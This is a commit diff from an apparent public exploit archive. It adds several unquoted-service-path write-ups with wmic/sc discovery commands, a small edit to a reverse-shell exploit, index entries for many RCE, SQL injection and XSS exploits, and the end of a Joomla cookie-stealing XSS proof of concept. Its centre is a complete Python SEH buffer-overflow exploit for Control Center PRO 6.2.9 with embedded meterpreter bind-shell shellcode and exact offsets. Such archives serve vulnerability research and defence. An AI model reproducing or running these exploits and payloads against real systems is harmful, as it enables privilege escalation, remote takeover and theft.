for="modlgn-username" class="element-invisible">Username</label>
</span>
<input
id="modlgn-username" type="text" name="username" class="input-small"
tabindex="0" size="18" placeholder="Username" />
</div>
</div>
</div>
<div id="form-login-password" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-lock hasTooltip" title="Password">
</span>
<label
for="modlgn-passwd" class="element-invisible">Password
</label>
</span>
<input
id="modlgn-passwd" type="password" name="password" class="input-small"
tabindex="0" size="18" placeholder="Password" />
</div>
</div>
</div>
<div
id="form-login-remember" class="control-group checkbox">
<label for="modlgn-remember"
class="control-label">Remember Me</label> <input id="modlgn-remember"
type="checkbox" name="remember" class="inputbox" value="yes"/>
</div>
<div id="form-login-submit"
class="control-group">
<div class="controls">
<button type="submit" tabindex="0"
name="Submit" class="btn btn-primary login-button">Log in</button>
</div>
</div>
<ul class="unstyled">
<li>
<a
href="/joomla/index.php/component/users/?view=remind&Itemid=101">
Forgot your username?</a>
</li>
<li>
<a
href="/joomla/index.php/component/users/?view=reset&Itemid=101">
Forgot your password?</a>
</li>
</ul>
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<input type="hidden" name="return"
value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />
<input type="hidden"
name="d460ac322fbbb6ae67cc78034182d9e1" value="1" /> </div>
</form>
</div>
<!-- End Right Sidebar -->
</div>
</div>
</div>
</div>
<!-- Footer -->
<footer class="footer" role="contentinfo">
<div class="container">
<hr />
<p class="pull-right">
<a href="#top" id="back-top">
Back to Top
</a>
</p>
<p>
&copy; 2019
javacript:alert(document.cookie) </p>
</div>
</footer>
</body>
</html>
#PoC Visual
https://imgur.com/a/IgO4ZxI

36
exploits/windows/local/47615.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path
# Date: 2019-11-11
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.acronis.com
# Software: ftp://supportdownload:supportdownload@ftp.kingston.com/AcronisTrueImageOEM_5128.exe
# Version: 19.0.5128
# Tested on: Windows 10
# Description:
# Acronis True Image OEM 19.0.5128 suffers from an unquoted search path issue impacting the service 'afcdpsrv'. This could potentially allow an
# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If successful, the local users code would execute with the elevated privileges
# of the application.
# Prerequisites
# Local, Non-privileged Local User with restart capabilities
# Details
C:\>wmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Acronis Nonstop Backup Service afcdpsrv C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe Auto
C:\>sc qc afcdpsrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: afcdpsrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\Acronis\CDP\afcdpsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Acronis Nonstop Backup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

29
exploits/windows/local/47617.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 2.4.3.231
# Tested on: Windows 10 Home Single Language
# CVE : N/A
# Explot-Wondershare WsAppService.txt
#Service Info:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto
C:\Users\user>sc query WsAppService
NOMBRE_SERVICIO: WsAppService
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x0
INDICACIÓN_INICIO : 0x0

31
exploits/windows/local/47637.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path
# Date: 2019-11-12
# Exploit Author: Mario Rodriguez
# Vendor Homepage: https://www.alps.com/e/
# Software Link: https://www.alps.com/e/
# Version: 8.1202.1711.04
# Tested on: Windows 10 Home x64 Spanish
#The Alps Pointing-device controller installs a service with an unquoted path
#which could be used as a local privilege escalation vulnerability. To exploit this vulnerability,
#an executable file could be placed in the path of the service and after rebooting the system or
#restarting the service the malicious code will be executed with elevated privileges.
#Step to discover the vulnerability
C:\Users\user>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Alps HID Monitor Service ApHidMonitorService C:\Program Files\Apoint2K\HidMonitorSvc.exe Auto
C:\Users\user>sc qc ApHidMonitorService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ApHidMonitorService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Apoint2K\HidMonitorSvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Alps HID Monitor Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

27
exploits/windows/local/47642.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage:https://www.realtek.com/en/
# Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA
# Version: 6.4.10041.133
# Tested on: Windows 10 Home Single Language
# CVE : N/A
# Explot-Realtek.txt
#Service Info:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
RTK IIS Codec Service RtkI2SCodec C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe Auto
C:\Users\user>sc query RtkI2SCodec
NOMBRE_SERVICIO: RtkI2SCodec
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x0
INDICACIÓN_INICIO : 0x0

148
exploits/windows/local/47645.py Executable file
View file

@ -0,0 +1,148 @@
# Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH)
# Date: 2019-11-09
# Exploit Author: Samir sanchez garnica @sasaga92
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610
# Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown
# Version: 6.2.9
# Tested: Windows 10 pro N and Windows XP SP3
# CVE : N/A
#!/usr/bin/python
'''
Existe una vulnerabilidad de desbordamiento de pila, una vez se intenta hacer uso del modulo crear usuario, en el campo username/nombre, copiando una cantidad
considerable de strings, la cual no es controlada por el software y se produce una sobreescritura del SEH)
'''
import sys
import random
import string
import struct
import argparse
def pattern_create(_type,_length):
_type = _type.split(" ")
if _type[0] == "trash":
return _type[1] * _length
elif _type[0] == "random":
return ''.join(random.choice(string.lowercase) for i in range(_length))
elif _type[0] == "pattern":
_pattern = ''
_parts = ['A', 'a', '0']
while len(_pattern) != _length:
_pattern += _parts[len(_pattern) % 3]
if len(_pattern) % 3 == 0:
_parts[2] = chr(ord(_parts[2]) + 1)
if _parts[2] > '9':
_parts[2] = '0'
_parts[1] = chr(ord(_parts[1]) + 1)
if _parts[1] > 'z':
_parts[1] = 'a'
_parts[0] = chr(ord(_parts[0]) + 1)
if _parts[0] > 'Z':
_parts[0] = 'A'
return _pattern
else:
return "Not Found"
def generate_file(_name_file, _payload):
print _payload
print "[+] Creando Archivo malicioso"
_name_file = open(_name_file,"w+")
_name_file.write(_payload)
_name_file.close()
print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload))
def main():
_parser = argparse.ArgumentParser()
_parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True)
_args = _parser.parse_args()
#badchars 0x0a, 0x0d, >= 0x80
_name_exploit = "ControlCenterPRO_v6_2_9.txt"
#sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP
_shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70"
"\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50"
"\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b"
"\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30"
"\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c"
"\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b"
"\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70"
"\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a"
"\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70"
"\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32"
"\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f"
"\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79"
"\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d"
"\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37"
"\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58"
"\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a"
"\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71"
"\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73"
"\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63"
"\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63"
"\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f"
"\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58"
"\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70"
"\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39"
"\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f"
"\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63"
"\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46"
"\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69"
"\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37"
"\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71"
"\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77"
"\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31"
"\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72"
"\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63"
"\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38"
"\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51"
"\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73"
"\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35"
"\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48"
"\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44"
"\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a"
"\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79"
"\x53\x41\x41")
_offset = 664
_padding = 40000
_nseh = "\x42\x42\x77\x08"
_seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi nonull, ascii
if _args.os.lower() == "win10":
_esp_prepend = "\x54\x58\x66\x05\x34\x18\x50\x5C"
_inject = pattern_create("trash A",_offset)
_inject += _nseh
_inject += _seh
_inject += "A" * 4
_inject += _esp_prepend
_inject += _shellcode
_inject += pattern_create("trash D",_padding-len(_inject))
elif _args.os.lower() == "winxp":
_esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C"
_inject = pattern_create("trash A",_offset)
_inject += _nseh
_inject += _seh
_inject += "A" * 4
_inject += _esp_prepend
_inject += "A" * 16
_inject += _shellcode
_inject += pattern_create("trash D",_padding-len(_inject))
else:
print("[-] os select is not support, select win10 or winxp")
generate_file(_name_exploit, _inject)
if __name__ == "__main__":
main()

27
exploits/windows/local/47647.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Wondershare Application Framework Service - "WsAppService" Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 2.4.3.231
# Tested on: Windows 10 Home Single Language
# CVE : N/A
#Service Info:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto
C:\Users\user>sc query WsAppService
NOMBRE_SERVICIO: WsAppService
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x0
INDICACIÓN_INICIO : 0x0

4
exploits/windows/remote/47554.py
View file

@ -5,7 +5,7 @@
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Tested on: Windows 10
# Note: Every version of Windows 10 has a different offset ¯\_(ツ)_/¯
# Note: Every version of Windows 10 has a different offset and sometimes you need to run the exploit twice before you can pop a shell ¯\_(ツ)_/¯
#!/usr/bin/python
@ -13,7 +13,7 @@ import sys
import socket
import time
#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISYTENING_PORT -b '\x00\xd9' -f python
#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISTENING_PORT -b '\x00\xd9' -f python
buf = ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"

37
files_exploits.csv
View file

@ -10764,6 +10764,12 @@ id,file,description,date,author,type,platform,port
47604,exploits/windows/local/47604.txt,"_GCafé 3.0 - 'gbClienService' Unquoted Service Path",2019-11-11,4ll4u,local,windows,
47605,exploits/windows/local/47605.txt,"Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path",2019-11-11,"Héctor Gabriel Chimecatl Hernández",local,windows,
47606,exploits/xml/local/47606.txt,"XML Notepad 2.8.0.4 - XML External Entity Injection",2019-11-11,daejinoh,local,xml,
47615,exploits/windows/local/47615.txt,"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path",2019-11-12,"Alejandra Sánchez",local,windows,
47617,exploits/windows/local/47617.txt,"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path",2019-11-12,chuyreds,local,windows,
47637,exploits/windows/local/47637.txt,"Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path",2019-11-12,"Mario Rodriguez",local,windows,
47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,
47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,
47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -17773,6 +17779,9 @@ id,file,description,date,author,type,platform,port
47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
47602,exploits/linux/remote/47602.rb,"rConfig - install Command Execution (Metasploit)",2019-11-08,Metasploit,remote,linux,
47625,exploits/hardware/remote/47625.py,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution",2019-11-12,LiquidWorm,remote,hardware,
47626,exploits/hardware/remote/47626.rb,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)",2019-11-12,LiquidWorm,remote,hardware,
47629,exploits/hardware/remote/47629.txt,"CBAS-Web 19.0.0 - Information Disclosure",2019-11-12,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41890,6 +41899,10 @@ id,file,description,date,author,type,platform,port
47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,
47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php,
47612,exploits/hardware/webapps/47612.py,"Prima FlexAir Access Control 2.3.38 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
47613,exploits/aspx/webapps/47613.txt,"Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
47614,exploits/hardware/webapps/47614.txt,"Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,
47611,exploits/aspx/webapps/47611.txt,"Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
@ -41927,3 +41940,27 @@ id,file,description,date,author,type,platform,port
47598,exploits/java/webapps/47598.py,"Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting",2019-11-08,vesche,webapps,java,
47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,
47603,exploits/php/webapps/47603.txt,"Nextcloud 17 - Cross-Site Request Forgery",2019-11-08,"Ozer Goker",webapps,php,
47616,exploits/hardware/webapps/47616.txt,"eMerge E3 1.00-06 - Unauthenticated Directory Traversal",2019-11-12,LiquidWorm,webapps,hardware,
47618,exploits/hardware/webapps/47618.txt,"eMerge E3 1.00-06 - Privilege Escalation",2019-11-12,LiquidWorm,webapps,hardware,
47619,exploits/hardware/webapps/47619.py,"eMerge E3 1.00-06 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
47620,exploits/hardware/webapps/47620.txt,"eMerge E3 1.00-06 - Cross-Site Request Forgery",2019-11-12,LiquidWorm,webapps,hardware,
47621,exploits/jsp/webapps/47621.py,"Atlassian Confluence 6.15.1 - Directory Traversal",2019-11-12,max7253,webapps,jsp,
47622,exploits/hardware/webapps/47622.py,"eMerge E3 1.00-06 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,
47623,exploits/hardware/webapps/47623.txt,"eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,
47624,exploits/hardware/webapps/47624.sh,"eMerge50P 5000P 4.6.07 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
47627,exploits/hardware/webapps/47627.py,"CBAS-Web 19.0.0 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
47628,exploits/hardware/webapps/47628.txt,"CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)",2019-11-12,LiquidWorm,webapps,hardware,
47630,exploits/hardware/webapps/47630.txt,"CBAS-Web 19.0.0 - Username Enumeration",2019-11-12,LiquidWorm,webapps,hardware,
47631,exploits/php/webapps/47631.txt,"CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection",2019-11-12,LiquidWorm,webapps,php,
47632,exploits/php/webapps/47632.txt,"Joomla 3.9.13 - 'Host' Header Injection",2019-11-12,"Pablo Santiago",webapps,php,
47633,exploits/alpha/webapps/47633.txt,"Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,alpha,
47634,exploits/hardware/webapps/47634.txt,"Prima Access Control 2.3.35 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,
47635,exploits/jsp/webapps/47635.rb,"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)",2019-11-12,max7253,webapps,jsp,
47636,exploits/hardware/webapps/47636.txt,"Optergy 2.3.0a - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
47638,exploits/hardware/webapps/47638.sh,"FlexAir Access Control 2.4.9api3 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
47639,exploits/hardware/webapps/47639.txt,"Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)",2019-11-12,LiquidWorm,webapps,hardware,
47640,exploits/hardware/webapps/47640.txt,"Optergy 2.3.0a - Username Disclosure",2019-11-12,LiquidWorm,webapps,hardware,
47641,exploits/hardware/webapps/47641.py,"Optergy 2.3.0a - Remote Code Execution (Backdoor)",2019-11-12,LiquidWorm,webapps,hardware,
47643,exploits/aspx/webapps/47643.txt,"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,
47648,exploits/hardware/webapps/47648.txt,"Bematech Printer MP-4200 - Denial of Service",2019-11-12,"Jonatas Fil",webapps,hardware,

Can't render this file because it is too large.